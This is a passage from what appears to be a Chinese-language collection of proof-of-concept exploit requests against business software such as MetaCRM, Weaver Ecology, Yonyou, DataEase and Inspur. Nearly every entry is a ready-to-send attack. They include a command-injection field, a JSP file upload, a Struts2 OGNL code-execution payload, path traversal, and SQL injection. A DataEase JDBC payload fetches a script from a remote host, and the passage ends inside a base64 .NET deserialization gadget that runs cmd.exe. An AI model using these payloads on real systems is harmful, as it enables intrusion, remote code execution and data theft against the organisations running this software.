1300 | Cookie: FORTSESSIONID=78DFD83A276124B65ECA5D316D66D47F
1301 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
1302 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
1303 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1304 | Accept-Encoding: gzip, deflate, br
1305 | Upgrade-Insecure-Requests: 1
1306 | Sec-Fetch-Dest: document
1307 | Sec-Fetch-Mode: navigate
1308 | Sec-Fetch-Site: none
1309 | Sec-Fetch-User: ?1
1310 | Priority: u=0, i
1311 | Te: trailers
1312 | Connection: close
1313 | Content-Type: application/json
1314 | Content-Length: 94
1315 | 
1316 | {"userName":"Bob", "loginUrl":"`id`", "role":"", "password":"123456789"}
1317 | 
1318 | MetaCRM 客户关系管理系统 sendfile.jsp 任意文件上传漏洞
1319 | 
1320 | POST /business/common/importdata/sendfile.jsp HTTP/1.1
1321 | Host: 
1322 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpW22
1323 | 
1324 | ------WebKitFormBoundary03rNBzFMIytvpW22
1325 | Content-Disposition: form-data; name="file"; filename="1.jsp"
1326 | 
1327 | <%out.println(new java.util.Random().nextInt(100));new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
1328 | ------WebKitFormBoundary03rNBzFMIytvpW22--
1329 | 
1330 | 
1331 |  AgentSyste代理商管理系统 login.action Struts2 远程代码执行漏洞
1332 | 
1333 | POST /login.action HTTP/1.1
1334 | Host:
1335 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/123.0
1336 | Content-Type: application/x-www-form-urlencoded
1337 | 
1338 | debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()
1339 | 
1340 |  NIPS 绿盟网络入侵防护系统users.json敏感信息泄漏
1341 | 
1342 | GET /api/config/users.json HTTP/1.1
1343 | Host: 
1344 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
1345 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1346 | Accept-Language: en-US,en;q=0.5
1347 | Accept-Encoding: gzip, deflate
1348 | Connection: close
1349 | 
1350 | 泛微Ecology目录遍历漏洞
1351 | 
1352 | /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
1353 | /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
1354 | /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
1355 | 
1356 | 用友
1357 | POST /portal/pt/oacoSchedulerEvents/changeEvent?pageId=login HTTP/1.1
1358 | Host:
1359 | Content-Type: application/x-www-form-urlencoded
1360 | 
1361 | event_id=1' AND 1=dbms_pipe.receive_message('RDS',5)--+#&startDate=2025-06-16 00:00:00&startDate_old=2025-06-16 24:00:00
1362 | 
1363 | 金和OA SQL注入漏洞
1364 | GET /C6/JHSoft.Web.DailyTaskManage/TaskTreeJSON.aspx/?id=1%27+union+all+select+null%2C%28select+@@VERSION%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--+ HTTP/1.1
1365 | Host:
1366 | Accept-Encoding: gzip, deflate
1367 | X-Requested-With: XMLHttpRequest
1368 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
1369 | Accept: application/json, text/javascript, */*; q=0.01
1370 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1371 | 
1372 | 飞致云 DataEase Postgresql JDBC Bypass 远程代码执行漏洞 CVE-2025-49002
1373 | POST /de2api/datasource/validate HTTP/1.1
1374 | Host: your-ip
1375 | Accept-Encoding: gzip, deflate, br, zstd
1376 | sec-ch-ua: "Google Chrome";v="135", "Not-A.Brand";v="8", "Chromium";v="135"
1377 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
1378 | Accept: application/json, text/plain, */*
1379 | X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
1380 | Accept-Language: zh-CN
1381 | Sec-Fetch-Dest: empty
1382 | sec-ch-ua-mobile: ?0
1383 | Sec-Fetch-Site: same-origin
1384 | sec-ch-ua-platform: "Windows"
1385 | Content-Type: application/json
1386 | Sec-Fetch-Mode: cors
1387 | Content-Length: 821
1388 | 
1389 | {
1390 |     "id": "",
1391 |     "name": "11",
1392 |     "description": "",
1393 |     "type": "h2",
1394 |     "apiConfiguration": [],
1395 |     "paramsConfiguration": [],
1396 |     "enableDataFill": false,
1397 |     "configuration": "eyJkYXRhQmFzZSI6IiIsImpkYmMiOiJqZGJjOmgyOm1lbTp0ZXN0ZGI7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO2luaXQ9UlVuU0NSSVBUIEZST00gJ2h0dHA6Ly95b3VyLXZwczoyMzMzL3BvYy5zcWwnIiwidXJsVHlwZSI6ImpkYmNVcmwiLCJzc2hUeXBlIjoicGFzc3dvcmQiLCJleHRyYVBhcmFtcyI6IiIsInVzZXJuYW1lIjoiMTIzIiwicGFzc3dvcmQiOiIxMjMiLCJob3N0IjoiIiwiYXV0aE1ldGhvZCI6IiIsInBvcnQiOjAsImluaXRpYWxQb29sU2l6ZSI6NSwibWluUG9vbFNpemUiOjUsIm1heFBvb2xTaXplIjo1LCJxdWVyeVRpbWVvdXQiOjMwfQ=="
1398 | }
1399 | 
1400 | 华测监测预警系统2.2 sysGroupEdit.aspx SQL注入
1401 | GET /Web/SysManage/sysGroupEdit.aspx?id=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2889%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%28105%29%2BCHAR%28119%29%2BCHAR%2898%29%2BCHAR%28110%29%2BCHAR%2867%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2869%29%2BCHAR%28118%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%2866%29%2BCHAR%2899%29%2BCHAR%2868%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%28117%29%2BCHAR%2875%29%2BCHAR%2876%29%2BCHAR%28115%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%2873%29%2BCHAR%2888%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2877%29%2BCHAR%2876%29%2BCHAR%2880%29%2BCHAR%2898%29%2BCHAR%28119%29%2BCHAR%2889%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28113%29--+wkZw
1402 | 
1403 | 浪潮云财务系统命令执行漏洞
1404 | POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1
1405 | Host: {{Hostname}}
1406 | Content-Type: text/xml; charset=utf-8
1407 | SOAPAction: "http://tempuri.org/GetChildFormAndEntityList"
1408 | cmd: path
1409 | 
1410 | <?xml version="1.0" encoding="utf-8"?>
1411 | <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
1412 | <soap:Body>
1413 | <GetChildFormAndEntityList xmlns="http://tempuri.org/">
1414 | <baseFormID>validStringID</baseFormID>
1415 | <baseEntityID>validStringID</baseEntityID>
1416 | <strFormAssignment>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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b2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAAC